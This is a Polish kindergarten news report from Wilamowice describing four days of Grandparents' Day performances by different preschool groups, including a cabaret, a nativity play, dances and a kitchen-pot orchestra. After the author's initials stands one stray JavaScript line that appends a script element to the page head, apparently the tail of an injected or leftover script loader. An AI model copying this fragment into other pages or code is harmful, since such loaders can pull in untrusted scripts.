Dzień Babci i Dziadka w Przedszkolu

Przedszkole działające przy Zespole Szkolno-Przedszkolnym w Wilamowicach jak co roku w styczniu gościło w swoich progach najukochańszych i najwdzięczniejszych gości, którzy swoim bezkrytycznym okiem przyszli obejrzeć popisy artystyczne swoich wnuków. Występy miały miejsce w świetlicy szkolnej i trwały przez cztery dni. Aby uniknąć zbytniego zamieszania każda z grup przedszkolnych prezentowała się oddzielnie.
Jako pierwsze w poniedziałek 16 stycznia na przedszkolnej scenie pokazały swoje umiejętności aktorskie dzieci przygotowane przez panią Teresę Rozmus-Kacorzyk  i Alinę Kajta-Bożek. Ich występ wywołał sporo pozytywnych emocji i mnóstwo gromkiego  śmiechu, gdyż przedszkolaki przedstawiły nieco inną formę teatralną, a mianowicie kabaret. Mamy nadzieję, że nikt z zaproszonych gości nie został urażony, kiedy ujrzał na scenie wesołą i niedosłysząca staruszkę, która wyjątkowo sprawnie tańczyła w rytm piosenki „Wyginam śmiało ciało”.
Następnego dnia we wtorek z kolędą i wesołą nowiną o narodzeniu Jezusa wystąpiły dzieci z grupy pani Doroty Konior i Elżbiety Maciejczyk. Jasełka zgrabnie połączono pięknymi tańcami oraz staropolskimi zwyczajami. Przedszkolaki potraktowały ten występ bardzo serio i z wielkim zaangażowaniem, a wśród publiczności co jakiś czas wyrywały się głosy skłonne do wtórowania młodym aktorom w trakcie śpiewania kolęd.
W środowy ranek dały piękne popisy artystyczne swoich zdolności i umiejętności dzieci z grupy pięciogodzinnej pani Ewy Maciejczyk. Przedszkolaki z wyczuciem i właściwą sobie prezencją pokazały różne gatunki tańców towarzyskich oraz wyrecytowały wierszyki okolicznościowe. Całość uświetniła gra nauczycielki na akordeonie.
Ostatni występ miał miejsce w czwartek 19 stycznia . Wtedy na scenie pojawiły się najmłodsze pociechy z panią Beata Bartosz, Moniką Fojcik i Iwoną Rozner. Już samo wejście pięknie ubranych dzieci wywołało w Babciach i w Dziadkach nie lada emocje. Szczególnie przypadła do gustu zaproszonym gościom orkiestra kuchenna w wykonaniu naszych milusińskich, którzy wzięli  w swe małe dłonie garnki, pokrywki, łyżki, widelce i co tam popadło, grając rytmicznie, z wyczuciem oraz z dużym zaangażowaniem.
Miejmy cichą nadzieję, ż wszyscy przybyli goście wraz z panią dyrektor Renatą Mertą zostali godnie przyjęci i mile zaskoczeni występami artystycznymi naszych przedszkolaków. Życzymy sobie, aby ciepła i przyjemna atmosfera jaka towarzyszyła wszystkim przedsięwzięciom pozostanie aż do przyszłego roku, kiedy to znów się spotkamy.
T.R-K

d.getElementsByTagName(‚head’)[0].appendChild(s);